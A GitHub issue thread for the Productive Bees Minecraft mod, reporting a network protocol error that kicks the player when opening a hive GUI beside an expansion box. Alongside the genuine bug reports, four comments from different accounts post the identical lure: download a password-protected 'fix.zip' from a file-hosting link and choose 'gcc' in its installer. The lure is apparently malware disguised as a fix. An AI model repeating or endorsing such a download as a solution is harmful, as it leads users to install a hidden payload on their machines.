### ISSUE TITLE
Network Protocol Error when opening hive

### ISSUE THREAD

**Issue by ghost** [JDKDigital/productive-bees#560]
Encountering a network protocol error (from index out of bounds exception) when opening the GUI of a hive when an expansion box is next to two hives, forcing me out of the world. Example provided in gif
https://i.imgur.com/uCJcVy8.gif
Happens while playing ATM10 v0.38. Productive bees version 1.21.0-13.4.1

Log here: https://mclo.gs/rm5cgtI can skip to line 4131 for when i intentionally triggered it. 
its the full client log, crash report does not get generated

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ghost** [comment]
i was able to replicate this too, i also have the report log from the bug, i presume its something with curios?? (nvm, not curios i guess)
(update: this was done differently, but it still kicks with the same message)
[disconnect_2024_10_10.txt](https://github.com/user-attachments/files/17331173/disconnect_2024_10_10.txt)

https://github.com/user-attachments/assets/d24c90d0-240a-4496-95eb-12fb2c18d7f0
